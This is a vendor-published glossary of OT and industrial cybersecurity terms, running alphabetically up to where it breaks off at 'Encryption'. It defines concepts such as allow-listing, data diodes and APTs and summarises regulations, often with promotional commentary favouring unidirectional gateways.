OT Security Glossary

An alphabetical OT Security Glossary of common OT security industry terms and technical jargon that often gets thrown around and repeated, but not always explained.

This Cyber Security Glossary focuses on explaining words, concepts, acronyms, and other expressions that are geared toward OT security, as well as general cybersecurity that is used when securing critical infrastructures and industrial systems.

Administrative Privileges

An account or application with permission to change everything on a computer or device.

Advanced Persistent Threat (APT)

Also known as a targeted persistent attack. An attack by a persistent adversary, with a specific target, generally using interactive remote control techniques. Targeted attackers are unlikely to be distracted by other, less-well defended targets, contradicting the common wisdom “you only need to be better defended than your neighbor.”

Active Directory (AD)

A Microsoft product that manages passwords, security policies and other configurations for a network of computers.

Air Gap

An air gap, air wall, air gapping, or disconnected network is a network security measure employed on one or more computers to ensure that a secure computer network is physically isolated from any other networks or external connections.

Allow-Listing Systems

What they are: Allow-listing systems intercept operating system functions that execute software, restricting execution to a list of “known good” allowed software.

Where to use: Allow-listing systems are recommended for all industrial systems that tolerate this kind of protection. Allow-listing systems are seen as better fits for most industrial environments than anti-virus systems for many reasons. Most allow-listing systems do not need the regular, resource-intensive, full filesystem scans that anti-virus systems need. Allow-listing systems prevent the execution of all known software, including new attack software the system has never before seen.

Intrinsic Limitations: All allow-listing systems are software, with vulnerabilities known and unknown that can be exploited. Allow-listing systems generally intercept and check the validity of software as it is loaded into memory for execution. As such, these systems tend to be blind to over-the-network in-memory attacks. These systems can also be blind to scripted malware arriving as text files and executed by interpreters that are allowed to execute because they are needed in parts of the automation system. Allow-listing systems are also vulnerable during software / security updates. During such updates, new software must be registered as “allowed.” Allow-listing systems are therefor vulnerable to attacks that masquerade malware as legitimate software during installation and update processes.

What they are: Allow-listing systems intercept operating system functions that execute software, restricting execution to a list of “known good” allowed software.

American Standard Code for Information Interchange (ASCII)

A character encoding standard for electronic communication. ASCII codes represent text in computers, telecommunications equipment, and other devices. ASCII has just 128 code points, of which only 95 are printable characters, which severely limit its scope. The set of available punctuation had significant impact on the syntax of computer languages and text markup. ASCII hugely influenced the design of character sets used by modern computers, including Unicode which has over a million code points, but the first 128 of these are the same as ASCII.

Analog

The opposite of digital – for example, mechanical or electrical switches, gauges and dials.

Anomaly-based Intrusion-Detection System

An intrusion-detection system (IDS) that in some sense learns what “normal” behavior is for a computer, network or other system, and raises alerts when the system behaves outside of these learned, normal bounds. Limitations: Most intrusion-detection systems are software, and contain vulnerabilities that may be exploited. In addition, most anomaly-based systems learn that normal system behavior is a range of measured values, such as network usage or memory usage. The most common attack on anomaly-based intrusion-detection system is a “slow” attack, one that changes learned values only slightly, staying within the limits the anomaly-based system has learned are normal.

Anti-Virus Systems

What they are: Anti-virus systems are Host IDS systems with extra functionality to prevent writing malware to disk, loading malware from disk, executing malware or otherwise interrupt attacks in progress, hopefully before those attacks cause unacceptable consequences.

Where to use: Anti-virus systems are recommended for all industrial systems that tolerate or support these systems. Like Host IDS systems, however, many industrial devices do not support the installation of third-party software such as anti-virus systems or come with a built-in anti-virus system and support only that one. Many industrial systems cannot tolerate full filesystem scans and may not have been tested for safe and reliable operation with anti-virus functions intercepting system functions to understand what the protected host is doing that might be suspicious.

Intrinsic Limitations: All anti-virus systems are software, with vulnerabilities known and unknown that can be exploited. Signature-based anti-virus can only detect “old” attacks – attacks that vendors have seen already and for which signatures have been produced, distributed, and installed. Anomaly-based anti-virus can detect attacks that “look” suspicious with respect to the characteristics the built-in host IDS function is monitoring / learning. A big risk for anti-virus systems is false alarms – if a defective signature file is loaded into an anti-virus system, that system risks quarantining or otherwise interrupting the correct function of legitimate automation and operating system software.

Annual Loss Expectancy (ALE)

The average loss we can expect from a risk in a one-year timeframe and is calculated by multiplying SLE by ARO.

ANSSI - Agence nationale de la sécurité des systèmes d'information.

The French national authority for cyber defense and network information security.

Application Control (AC)

A security technology that maintains a list of applications and libraries that are permitted to execute on a particular computer, and takes measures to block execution of unapproved code. Limitations: Application control systems are software and contain vulnerabilities that may be exploited. In addition, application control systems are unable to prevent execution of many scripted attacks, and can be vulnerable to software update attacks. Specifically, all application control systems must have some way to update the list of allowed executables when software version updates and security updates are applied. When an attacker can embed malware in what otherwise appears to be a legitimate update, the application control system will add that malware to the list of allowed executables.

Application Programming Interface (API)

A way for two or more computer programs or components to communicate with each other. It is a type of software interface, offering a service to other pieces of software. A document or standard that describes how to build or use such a connection or interface is called an API specification. A computer system that meets this standard is said to implement or expose an API. The term API may refer either to the specification or to the implementation. Whereas a system’s user interface dictates how its end-users interact with the system in question, its API dictates how to write code that takes advantage of that system’s capabilities.

Application specific integrated circuit (ASIC)

An integrated circuit (IC) chip customized for a particular use, rather than intended for general-purpose use, such as a chip designed to run in a digital voice recorder or a high efficiency video codec

APT1

The Military Unit Cover Designator (MUCD) of a People’s Liberation Army advanced persistent threat unit that has been alleged to be a source of Chinese computer hacking attacks.The unit is stationed in Pudong, Shanghai, and has been cited by US intelligence agencies since 2002.

APTA (USA Guidance)

What is it: Securing Control and Communications Systems in Rail Transit Environments – Part II Defining a Security Zone Architecture for Rail Transit and Protecting Critical Zones – This document presents Defense-in-Depth as recommended practice for securing railway control systems. It is the second part of a series of documents to be released presenting the importance of control and communication in transit systems and defines a minimum set of security controls for the most critical zones, the safety-critical security zone (SCSZ) and the fire, life-safety security zone (FLSZ). The intent of this document is to provide guidance to transit agencies on securing control and communications systems for their rail networks. The Enterprise Cybersecurity Work Group develops APTA standards pertaining to mass transit cybersecurity. Specifically, it provides strategic recommendations for Chief Information Officers and decision makers regarding business cybersecurity, information systems, fare collection and general cybersecurity technologies.

Relevancy to Unidirectional Gateways: The document outlines the fundamental differences in approach to protecting a business information system compared with an industrial control system and describes the different impacts and objectives of each. However it does not make the distinction that these disparate systems require different technology and solutions.

Waterfall Takeaway: For the rail industry, perhaps the UK will be leading the charge for the most sophisticated cyber security guidance. This document unfortunately leverages the traditional IT Defense-in-Depth model and applies it to the control and communications industrial systems of rail and transit environments, such a model leaves these environments vulnerable and prone to cyber breach.

Source: APTA

Artificial Intelligence (AI)

The theory and development of computer systems able to perform tasks normally requiring human intelligence, such as visual perception, speech recognition, decision-making, and translation between languages.

ASD/ACSC Information Security Manual - Guidelines for Gateways (Australian Guidance)

What is it: Information Security Manual – Guidelines for Gateways – Gateways are critical for an organisation to reduce the security risks associated with providing external parties with access to their networks. In doing so, it is important that gateways are used not only between an organisation’s networks and public network infrastructure, but also between an organisation’s networks that belong to different security domains and between an organisation’s networks and other organisations’ networks that are connected via means other than public network infrastructure.

Relevancy to Unidirectional Gateways: The entire document discusses all the different use cases and controls applicable to unidirectional gateway deployment: cross domain, separation of data flows, event logging, etc

Waterfall Takeaway: This is a security manual for the deployment and best usage of unidirectional gateways in critical infrastructure. It was published in 2023, and used to be confined to guidance within the defense sector. Now the Cyber Bodies are recommending the usage of unidirectional gateways in critical networks.

Source: CISC

ASD/ACSC Implementing Network Segmentation and Segregation (Australian Guidance)

What is it: This document intends to assist staff responsible for an organisation’s network architecture and design to increase the security posture of their networks by applying network segmentation and segregation strategies.

Relevancy to Unidirectional Gateways: This document is not specifically targeting an ICS/OT audience, however the topic of network segmentation is directly applicable to critical network protection. One of the technologies recommended to Implement at demilitarized zones and between networks with different security requirements is a data diode.

Waterfall Takeaway: Quick 6 page reference guide for ‘how to’ protect trusted zones from untrusted zones, and Waterfall’s technology is mentioned as a good solution.

AVEVA PI

AVEVA PI is a data management system that collects, stores, and visualizes real-time data for industrial operations.

AWWA Cybersecurity Guidance (Guidance)

What is it: AWWA advocates for a regulatory model for the Water sectors, similar to that of the Energy sector

Relevancy to Unidirectional Gateways: Potentially relevant as it provides cybersecurity risk management guidance for water systems, which may involve unidirectional gateways.

Source: AWWA

Biometric

Biometrics are body measurements and calculations related to human characteristics and features. Biometric authentication is used in computer science as a form of identification and access control. It is also used to identify individuals in groups that are under surveillance.

BIOS

Basic Input and Output System – a set of computer instructions in firmware which control input and output operations.

Bit (Binary Digit)

The smallest unit of data that a computer can process and store, always equal to a “1” or a “0” value. A bit is always in one of two physical states, similar to an on/off light switch. The state is represented by a single binary value, usually a 0 or 1. However, the state might also be represented by yes/no, on/off or true/false.

BlackEnergy

BlackEnergy Malware was first reported in 2007 as an HTTP-based toolkit that generated bots to execute distributed denial of service attacks. In 2010, BlackEnergy 2 emerged with capabilities beyond DDoS. In 2014, BlackEnergy 3 came equipped with a variety of plug-ins.

BLOB (Binary Large Object)

A Binary Large Object (blob) is a collection of data of an arbitrary size. Blobs do not have to follow a given format or have any metadata associated with them. They are a series of bytes, with each byte made up of 8 bits (a 1 or a 0, hence the “binary” descriptor).

Botnet

A collection of compromised computers under the remote control of a central computer or computers.

Breach

Also known as data leakage, is “the unauthorized exposure, disclosure, or loss of operational, personal or proprietary information”. Attackers have a variety of motives, from financial gain to political activism, political repression, and espionage.

BSEE Well Control Rule (Regulation, USA)

What is it: The final rule for Oil & Gas and Sulfur Operations in the Outer Continental Shelf (United States) The Well Control Rule became law on April 14, 2016, when the BSEE announced the release of the Blowout Preventer Systems and Well Control rule (Final Rule). The final Well Control Rule results in one of the most significant safety and environmental protection reforms the Department of Interior has undertaken – its purpose is to reduce the risk of an offshore oil or gas blowout that could result in the loss of life, serious injuries or substantial harm to the environment through modernizing and strengthening offshore energy standards.

Real Time Monitoring (RTM) of data in final rule (§ 250.724) requires operators to gather and monitor real-time well data using an independent, automatic, and continuous monitoring system capable of recording, storing, and transmitting data regarding the BOP control system, the well’s fluid handling system on the rig, and the well’s downhole conditions with the bottom hole assembly tools. These data must be transmitted as they are gathered (barring any unforeseen interruptions) and have the capability to monitor the data onshore, using qualified personnel, in accordance with a real-time monitoring plan.

This plan requires real-time monitoring capabilities, data transmission onshore during operations, data storage, procedures for providing BSEE access, procedures for communication between rig personnel and the onshore monitoring personnel, and actions to be taken if you lose any real-time monitoring capabilities or communications between rig and onshore personnel and how BSEE is to be notified.

Relevancy to Unidirectional Gateways: The requirement of real time data monitoring makes connecting ICS and business networks unavoidable. Oil companies will need to consider a new host of vulnerabilities and risks associated with connecting drilling rig industrial control systems to outside data centers in real time. This scenario makes unidirectional gateways all the more relevant when meeting data requirements of the Well Control Rule.

Waterfall Takeaway: Due to recent cyber attacks in the maritime industry, cyber security is quickly becoming front of mind for many operators. As new drilling rigs are already being built pursuant to the updated BSEE industry standards. People working in the offshore energy industry have expressed real concern that real-time monitoring could introduce potential cybersecurity threats that could put at risk failure of critical safety systems.

Source: gpo.gov (PDF)

BSI

Bundesamt für Sicherheit in der Informationstechnik – the Federal Office for Information Security in Germany

Buffer Overflow

An attack where larger-than-expected messages or message fields are sent to a computer. The computer software mistakenly writes the too-large data into memory, over-writing memory areas adjacent to the memory intended to store the data. Done carefully, this kind of attack can result in the target computer executing instructions in the attack itself, which is generally the first step in causing the compromised computer to download remote access type malware.

Bulk Electric System (BES)

The electrical generation resources, transmission lines, interconnections with neighboring systems, and associated equipment, generally operated at voltages of 100 kV or higher. BES is a legally-defined term used in NERC CIP standards (regulations).

C (Programming Language)

A general-purpose programming language (GPL) developed by Dennis Ritchie at Bell Laboratories in 1972. By design, C’s features cleanly reflect the capabilities of the targeted CPUs. It has found lasting use in operating systems code (especially in kernels), device drivers, and protocol stacks, but its use in application software has been decreasing. C is commonly used on computer architectures that range from the largest supercomputers to the smallest microcontrollers and embedded systems.

C2M2

From the the US Department of Energy: The Cybersecurity Capability Maturity Model (C2M2) is a free tool to help organizations evaluate their cybersecurity capabilities and optimize security investments. It uses a set of industry-vetted cybersecurity practices focused on both information technology (IT) and operations technology (OT) assets and environments.

Centrifuge

A machine with a rapidly rotating container that applies centrifugal force to its contents, typically to separate fluids of different densities (e.g. cream from milk) or liquids from solids.

Chip

Also called a microchip, a computer chip, an integrated circuit or IC. It consists of a set of electronic circuits on a small flat piece of silicon. On the chip, transistors act as miniature electrical switches that can turn a current on or off.

CSA Group - Cyber security for nuclear power plants and small reactor facilities (Canadian Standard)

What is it: Cyber security for nuclear power plants and small reactor facilities – This new standard N290.7-14 “Cyber security for nuclear power plants and small reactor facilities”, requires the use of unidirectional gateways to protect the most safety critical CEAs (Cyber Essential Assets). Its objective, “to secure essential computer systems and components against cyber-attacks”, will require the implementation of unidirectional technology to all routable communication paths on the perimeter of CEAs of highest safety significance.

Relevancy to Unidirectional Gateways:The standard breaks down categories of CEAs by security significance in accordance with the most important safety or security function a CEA performs. It takes a preventative posture by allowing only one way to secure the most important CEA’s from less-important networks of CEAs: hardware-enforced unidirectional gateways. The language contained in the regulation makes it clear that for the most important CEAs; insecure, unauthorized connections, unauthorized information flows, and remote deactivation and activation of services must prevented.

Waterfall Takeaway: Generally speaking, nuclear sites face unique risks. However, when it comes to protecting control networks and critical infrastructure from cyber attacks, nuclear is no different from other industrial networks – nuclear is just leading the charge. In 2010, the Nuclear Regulatory Commission (NRC) in the US, effectively forbade the use of firewalls to protect nuclear generator control networks from a less-trusted network. As a result, all American nuclear generators deployed unidirectional gateway technology. With Canada following the US regulator’s lead, control system security standards throughout the North American nuclear industry now recognize the preventative strength of Unidirectional Security Gateways.

Source: CCOHS

CIGRE (Framework by EU)

What is it: Framework for EPU operators to manage the response to a cyber-initiated threat to their critical infrastructure. (2017) 76 page document: This technical brochure describes a framework for a tool set that electric public utility (EPU) operators can used to automate their response to cyber-initiated threats. Within this framework, priority is placed on the capability for EPU personnel and supporting contractors to create, model, simulate, and control the response to a cyber threat. The three pillars of model-based system engineering (MBSE) are tailored for EPU applications to establish a coherent framework. CIGRE, based in Paris, France, stands for International Council on Large Electric Systems – Conseil international des grands réseaux électriques.

Relevancy to Unidirectional Gateways: Unidirectional gateways are mentioned about a dozen times, and data diodes several times. Andrew is quoted in the document, as WF made significant contributions to the draft. Under section 2.3.4 Protection against high networks, there is a deep dive into the physical inner-workings of UGWs. The authors make the case that UGWs are more secure than firewalls. Section 2.3.5 also delves into UGWs in relation to TCP/IP protocols, and draws distinction between UGWs and data diodes.

Waterfall Takeaway: Interesting how unidirectional technology is featured in a technical brochure for this European power council. Overall, this is a very comprehensive framework which references the NIST cybersecurity framework several times.

Please note that only CIGRE members have free access to the document, everyone else must pay 180 euros.

Circuit-level Gateway

Type of firewall or network security device that operates at the session layer (Layer 5) of the OSI model. It works by monitoring and controlling network traffic based on the transmission control protocol (TCP) handshaking process without inspecting the actual contents of the data packets.

CISA Top Cyber Actions for Securing Water Systems (Alert)

What is it: Joint fact sheet by CISA, EPA, and FBI.

Relevancy to Unidirectional Gateways: Potentially relevant as it outlines actions to reduce cyber risks in water systems, which could involve unidirectional gateways.

Source: CISA.gov

Cloud Computing

The practice of using a network of remote servers hosted on the internet to store, manage, and process data, rather than a local server or a personal computer.

Command and Control

Command and Control, commonly known as C2 or C&C, is one of the most destructive attacks. The Command and Control Infrastructure is crucial to attackers, and a potential vulnerability for defenders. Blocking C&C communications or destroying the C&C infrastructure of an enemy stops a cyberattack in its tracks.

Compromised

Any computer, connected device, or other electronic asset doing our enemy’s bidding in addition to or instead of our own.

Conduit

Consists of the grouping of cyber assets dedicated exclusively to communications, and which share the same cybersecurity requirements. When modeling zones and conduits, there are a series of important rules that professionals must take into account.

Confidentiality

Preserving authorized restrictions on access and disclosure, including means for protecting personal privacy and proprietary information.

Connector

A software component that enables two applications or services to communicate with each other.

Consequence

An effect associated with an event or condition, usually allowed, facilitated, caused, prevented or changed.

Control System

A control system manages, commands, directs, or regulates the behavior of other devices or systems using control loops. The control systems are designed via control engineering process.

Countermeasures

An action, device, procedure, or technique that reduces a threat, vulnerability, or attack, eliminating or preventing it by minimizing the harm it can cause.

CPNI

Customer proprietary network information is subscriber data acquired by telecommunications providers.

CPU

A central processing unit (CPU), also called a central processor, main processor, or just processor, is the most important processor in a given computer.

CRA - Cyber Resilience Act (Regulation)

What is it: Sets cybersecurity standards for digital products in the EU.

Relevancy to Unidirectional Gateways: Potentially relevant as it aims to ensure cybersecurity of digital products, which may include unidirectional gateways.

Source: European Commission

CRC

Cyclic redundancy check is an error-detecting code commonly used in digital networks and storage devices to detect accidental changes to digital data.

Criticality Boundary

A network boundary whereby the consequences of compromise go from acceptable to unacceptable.

CRT

CREST Penetration Tester: Assesses operating systems and common network services.

Cryptography

Cryptography is the technique of obfuscating or coding data, ensuring that only the person who is meant to see the information–and has the key to break the code–can read it.

CSB

The US Chemical Safety and Hazard Investigation Board

CSF

Cyber Security Framework

CSO

Chief Security Officer – an executive responsible for the safety and security of company data, personnel, and assets. CSOs are responsible for preventing data breaches, phishing, and malware, by developing robust safety protocols and crisis management.

CSV

One of the core purposes of Continuous Security Validation (CSV) is to ensure that the security controls are configured as hermetically as possible to confirm that it is both preventing unwanted intrusions and enabling unfettered operations.

Not to be confused with Comma Separated Values (.csv) which is a type of spreadsheet file that uses plaintext ASCII characters.

CTO

Chief Technology Officer – a senior executive responsible for an organization’s technology strategy and the development and implementation of new technology initiatives. The CTO is responsible for ensuring that the company’s technology infrastructure is aligned with its overall business goals and objectives.

Current Loop

In electrical signalling an analog current loop is used where a device must be monitored or controlled remotely over a pair of conductors.

Cyber

Relating to or characteristic of the culture of computers, information technology, and virtual reality.

Cyberattack

A cyberattack is any intentional effort to steal, expose, alter, disable, or destroy data, applications, or other assets through unauthorized access.

Cyber Cell

A cyber cell could be defined as a capability of high functional specialisation and of a dual nature –both defensive and offensive–. Its function is to carry out a task with the goal of guaranteeing the security and defence of a specific area of cyber space.

Cyber Defense

Cyber defense is a coordinated act of resistance that guards information, systems, and networks from cyber attacks by implementing protective procedures such as firewalls, network detection and response (NDR), endpoint detection and response (EDR) to identify, analyze, and report incidents that occur within a network.

Cyber Espionage

The use of computer networks to gain illicit access to confidential information, typically that held by a government or other organization.

Cyber Informed Engineering (CIE)

Cyber-Informed Engineering (CIE) is a strategic initiative championed by Idaho National Laboratory (INL) to integrate cybersecurity into engineering practices for critical infrastructure

Cyber Resilience in Oil and Gas (International Initiative)

What is it: International initiative that aims to improve cyber resiliency across the Oil & Gas industry.

Relevancy to Unidirectional Gateways: Indirectly relevant as it highlights the need for robust cybersecurity practices, which could include unidirectional gateways.

Source: World Economic Forum

Cybersecurity

Cybersecurity is the application of technologies, processes, and controls to protect systems, networks, programs, devices and data from cyber attacks.

Cybersecurity for Industrial Control Systems (Regulation, France)

What is it: The purpose of the guide is to assess the cybersecurity of industrial control systems. Although specific to each facility, ICSs are in most cases made up of the following components: Programmable Logic Controllers (PLC); Distributed Control Systems (DCS); Safety Instrumented Systems (SIS); Sensors and actuators (intelligent or non-intelligent); Fieldbus; Supervisory control software: SCADA; Manufacturing execution system (MES); Engineering and maintenance software; Embedded systems.

Relevancy to Unidirectional Gateways: Highlights the essential role that Unidirectional Gateways play in protecting important industrial control and critical infrastructure information systems from less-trusted networks. This regulation forbids the use of Firewalls between the most critical industrial networks and less trusted networks. Here, they recommend unidirectional perimeter technology.

Waterfall Takeaway: This regulation highlights the essential role that Unidirectional Gateways play in protecting important industrial control and critical infrastructure information systems from less-trusted networks. The ANSSI guidance permits firewalls to be used to protect the least-critical control-system networks, and to provide internal segmentation within critical control-system networks. The guidance, however, forbids only firewall-class protections at the boundaries between the most critical networks and any less-critical, or less-trusted networks. For example, in most organizations with physical, industrial infrastructures, safety and control systems for those infrastructures would be classified as most critical, whereas all IT networks are by definition the least trusted networks.

Source: cyber.gov.fr

Cybersecurity Lifecycle

The cybersecurity lifecycle refers to the continuous process of managing and protecting an organization’s information systems and data from cyber threats. It involves the identification, protection, detection, response, and recovery stages to ensure effective cybersecurity measures.

Cybersecurity Resources for Manufacturers (Resource)

What is it: NIST provided resources to defend US owned assets from cyber threats.

Relevancy to Unidirectional Gateways: Indirectly relevant as it offers resources to protect manufacturing operations, potentially including unidirectional gateways.

Source: NIST

Data Diodes

What they are: The US NIST glossary defines data diodes as hardware that is physically able to send information in only one direction. If you Google “data diode” you will find close to 100 vendors world-wide, with each vendor selling their product to their local government. Data diodes are used routinely to send data into classified government and military networks with no ability to leak national secrets data back into unclassified networks or the Internet.

Where to use: Data diodes are recommended at consequence boundaries that connect classified government or military networks where worst-case consequences of data theft are unacceptable, to unclassified networks.

Intrinsic Limitations: Good data diodes deterministically control the flow of network packets and network information – diodes do nothing about potentially contaminated USB drives or laptops, or cell phones being carried into OT networks. Data diodes are hardware-intensive solutions. Most diode vendors provide little or no software to go with their products, preferring to develop any needed software on a custom engineering basis for their government and military customers. What little software diode vendors do provide tends to have low sales volumes, which means the vendors are not able to invest in features such as web-based or graphical user interfaces. When diode vendors provide software with their products, that software – like any software – has vulnerabilities that can be exploited. On the other hand, even if such vulnerabilities are exploited, the hardware in true data diodes is still physically incapable of leaking government secrets.

Data Exfiltration

Unauthorized movement of data from a protected network to an external destination.

Deep Packet Inspection

A feature within modern firewalls that supports firewall rules applied to the contents of data packets for a wide variety of IT protocols, providing an IT analogue of unidirectional application data control.

Demilitarized Zone (DMZ)

A demilitarized zone is a network that protects an organization’s internal network from untrusted traffic by acting as a buffer between the two: A DMZ’s purpose is to allow an organization to access untrusted networks, like the internet, while keeping its internal network secure.

United States Department of Defense (DoD)

The Department of Defense (DoD) is a U.S. federal agency responsible for overseeing the nation’s armed forces and ensuring national security through military power. It is the largest employer in the United States and operates globally to safeguard U.S. interests. The DoD’s key roles include:

DoD Primary Responsibilities

National Defense: Protecting the U.S. against external threats through military readiness.
Military Operations: Conducting operations ranging from combat missions to humanitarian aid.
Strategic Deterrence: Ensuring security through nuclear and conventional forces.
Cyber Defense: Protecting the nation’s cyber infrastructure.

Key Components of DoD:

Armed Services:
- Army: Land-based military operations.
- Navy: Maritime defense and operations.
- Air Force: Air and space superiority.
- Marine Corps: Rapid response and amphibious warfare.
- Space Force: Operations in space, established in 2019.
Joint Chiefs of Staff (JCS): Senior military leaders advising the President and Secretary of Defense.
Unified Combatant Commands: Regional or functional military commands (e.g., U.S. Central Command, U.S. Cyber Command).

DoD Supporting Agencies:

Defense Intelligence Agency (DIA): Military intelligence and analysis.
National Security Agency (NSA): Signals intelligence and cybersecurity.
Defense Advanced Research Projects Agency (DARPA): Cutting-edge military technology research.

Headquarters of DoD

The DoD is headquartered at the Pentagon in Arlington, Virginia. It is led by the Secretary of Defense, a civilian appointed by the President, who works alongside military leaders to shape defense policies and strategies.

The DoD plays a critical role in maintaining global stability and U.S. national interests, both at home and abroad.

United States Department of Energy (DoE)

The Department of Energy (DOE) is a U.S. federal agency responsible for managing the nation’s energy resources, advancing scientific research, ensuring energy security, overseeing nuclear safety, and addressing cybersecurity challenges within the energy sector. Established in 1977, the DOE plays a critical role in energy innovation, environmental stewardship, and securing critical infrastructure.

Primary Responsibilities of DOE

Energy Policy and Security:
- Ensuring a reliable, affordable, and sustainable energy supply.
- Reducing dependence on foreign energy sources.
- Promoting renewable energy technologies (e.g., solar, wind, geothermal).
Cybersecurity in Energy:
- Protecting the U.S. energy grid and critical infrastructure from cyber threats.
- Coordinating with other federal agencies and private sectors to mitigate cyber risks to energy systems.
- Developing and deploying advanced cybersecurity tools and technologies.
- Leading initiatives to enhance resilience against cyberattacks on industrial control systems (ICS) and operational technologies (OT).
Scientific Research:
- Funding and conducting research in areas like quantum computing and cybersecurity for energy systems.
- Managing 17 national laboratories, such as Sandia and Lawrence Livermore, which conduct cybersecurity research.
Nuclear Safety and Security:
- Maintaining and modernizing the U.S. nuclear weapons stockpile.
- Preventing proliferation of nuclear materials.
- Safeguarding nuclear infrastructure against physical and cyber threats.
Environmental Stewardship:
- Cleaning up hazardous waste from nuclear weapons production.
- Promoting energy efficiency and conservation.

Key Offices and Programs of DOE

Office of Cybersecurity, Energy Security, and Emergency Response (CESER):
- Focuses on improving the cybersecurity and resilience of energy systems.
- Collaborates with industry partners to prepare for, respond to, and recover from cyber incidents.
Energy Sector Cybersecurity Preparedness:
- Develops strategies to address emerging cyber threats in the energy domain.
- Supports energy providers with tools, guidelines, and training for cyber resilience.
Office of Science:
- Advances research in areas like artificial intelligence (AI) and cybersecurity applications for energy systems.
National Nuclear Security Administration (NNSA):
- Oversees cybersecurity measures for nuclear security operations.

Headquarters of DOE

The DOE is headquartered in Washington, D.C., with a network of national laboratories and field offices nationwide. The department is led by the Secretary of Energy, a Cabinet member appointed by the President.

Significance of DOE

The DOE plays a vital role in securing the nation’s energy infrastructure against cyber and physical threats, advancing clean energy initiatives, and addressing climate change. Its cybersecurity efforts ensure the resilience and reliability of the critical systems that power the nation.

United States Department of the Interior (DOI)

The Department of the Interior (DOI) is a U.S. federal agency responsible for managing the nation’s natural resources, public lands, wildlife, and cultural heritage. It also oversees relationships with Indigenous tribes and works to protect the environment. While traditionally focused on conservation and resource management, the DOI has increasingly incorporated cybersecurity into its responsibilities to safeguard critical infrastructure and sensitive data.

Primary Responsibilities of DOI

Natural Resource Management:
- Managing 480 million acres of public lands, including national parks, forests, and wildlife refuges.
- Overseeing energy resources, such as oil, gas, and renewable energy production on federal lands.
Wildlife Conservation:
- Protecting endangered species and their habitats.
- Managing national fish hatcheries and migratory bird conservation programs.
Cultural Preservation:
- Protecting historical landmarks and archaeological sites.
- Overseeing programs for cultural and heritage preservation.
Tribal Relations:
- Working with Indigenous tribes through the Bureau of Indian Affairs (BIA) to manage tribal lands and resources.
- Supporting tribal sovereignty and self-determination.
Cybersecurity in Resource and Land Management:
- Protecting the National Park Service (NPS) and other DOI-managed assets from cyber threats, including attacks on digital systems that monitor environmental conditions, visitor data, and operational technologies.
- Securing geospatial data and critical systems used for wildfire management, water resources, and energy infrastructure.
- Ensuring cybersecurity for systems managing permits and sensitive tribal data.

Key Offices and Programs of DOI

Office of the Chief Information Officer (OCIO):
- Leads DOI’s cybersecurity efforts by implementing policies and technologies to protect data and critical systems.
- Coordinates with federal cybersecurity initiatives to safeguard DOI’s IT and operational systems.
Bureau of Land Management (BLM):
- Oversees cybersecurity measures for energy infrastructure and public land management systems.
U.S. Geological Survey (USGS):
- Protects environmental and scientific data systems from cyber risks, including threats to Earth monitoring systems.
National Park Service (NPS):
- Secures systems that handle visitor data, park operations, and infrastructure.
Bureau of Indian Affairs (BIA):
- Works to secure sensitive tribal government data and operational systems.

Headquarters of DOI

The DOI is headquartered in Washington, D.C., and operates through a network of bureaus, regional offices, and field locations across the country. It is led by the Secretary of the Interior, a Cabinet member appointed by the President.

United States Department of Homeland Security (DHS)

The DHS, or Department of Homeland Security, is a U.S. federal agency established in response to the September 11, 2001, terrorist attacks. Its primary mission is to protect the United States from threats, including terrorism, natural disasters, cyber threats, and other security risks. DHS brings together several agencies and resources to coordinate national efforts on homeland security. Key agencies within DHS include:

Federal Emergency Management Agency (FEMA): Handles disaster response and preparedness.
Transportation Security Administration (TSA): Oversees airport and transportation security.
U.S. Customs and Border Protection (CBP): Manages borders and customs enforcement.
U.S. Citizenship and Immigration Services (USCIS): Administers the country’s immigration and naturalization system.
Cybersecurity and Infrastructure Security Agency (CISA): Works to protect the country’s critical infrastructure from cyber and physical threats.

DHS’s functions are diverse, spanning from preventing terrorism and managing immigration to responding to natural disasters and cyber protection.

Design Basis Threat

A description of the most capable adversary whose attacks a site is required to defeat with a high degree of confidence.

Deterministic

Engineering-grade solutions are defined as those that deterministically eliminate unacceptable consequences of defined attacks for a predictable period of time, no matter how the threat environment evolves over that time.

Device Control

Software to prevent most or all uses of removable media, such as CD-ROMs and DVDs, as well as most or all uses of removable devices, such as USB drives, on a computer. Limitations: Device control is software. All software has vulnerabilities, and can be subverted. Attacks on device control systems include custom firmware on USB devices to launch USB-communications attacks on connected computers, and forging device identifiers or mechanisms to distinguish allowed from forbidden devices.

DHS Alert (IR-ALERT-H-16-056-01)(USA Alert)

What is it: Alert (IR-ALERT-H-16-056-01) – In response to cyber attacks against Ukrainian critical infrastructure ICS-CERT issued an alert strongly encouraging organizations across all sectors to review and employ the mitigation strategies listed within the alert.

Organizations should isolate ICS networks from any untrusted networks, especially the Internet. Organizations should also limit Remote Access functionality wherever possible. Modems are especially insecure. Remote persistent vendor connections should not be allowed into the control network. Remote access should be operator controlled, time limited, and procedurally similar to “lock out, tag out.”

Relevancy to Unidirectional Gateways:If one-way communication can accomplish a task, use optical separation (“data diode”). If bidirectional communication is necessary, then use a single open port over a restricted network path. Users should implement “monitoring only” access that is enforced by data diodes, and not rely on “read only” access enforced by software configurations or permissions.

Waterfall Takeaways: Recognizes that interconnected networks are particularly attractive to a malicious actor, because a single point of compromise may provide extended access because of pre-existing trust established among interconnected resources.

Source: CISA

Distributed Control System (DCS)

A computerized system that controls industrial processes by distributing intelligence across the process, rather than using a single central unit. DCSs are used to automate industrial equipment and improve the safety, cost-effectiveness, and reliability of industrial processes.

Distributed Network Protocol 3 (DNP3)

Communication protocol that allows components of a Supervisory Control and Data Acquisition (SCADA) system to exchange information: DNP3 is used in industrial automation systems, particularly in utilities like electric and water companies. It’s also used in the gas and oil sectors.

Domain Name

In the Internet, a domain name is a string that identifies a realm of administrative autonomy, authority or control. Domain names are often used to identify services provided through the Internet, such as websites, email services and more.

Domain Name System (DNS)

The Domain Name System (DNS) is a hierarchical and distributed name service that provides a naming system for computers, services, and other resources on the Internet or other Internet Protocol (IP) networks. It associates various information with domain names assigned to each of the associated entities. Most prominently, it translates readily memorized domain names to the numerical IP addresses needed for locating and identifying computer services and devices with the underlying network protocols.

Download

Copying (data) from one computer system to another, typically over the internet.

Edge Devices

Any computing device that’s located near the edge of a network, usually near data sources or consumers. Edge devices are important for real-time applications and IoT deployments. They can: Process data locally, Translate protocols, Monitor and control machinery, Provide enhanced services, Examples of edge devices include: Scanners, Smartphones, Medical devices, Scientific instruments, Autonomous vehicles, Automated machines, Routers, Switches, Firewalls, and Integrated access devices (IADs).

Electic Power Research Institute (EPRI)

EPRI stands for Electric Power Research Institute, an independent, non-profit organization that conducts research and development to help the electricity sector

EKANS

EKANS ransomware is sophisticated malware targeting OT/ISC by identifying and infecting domain controllers.

Encryption

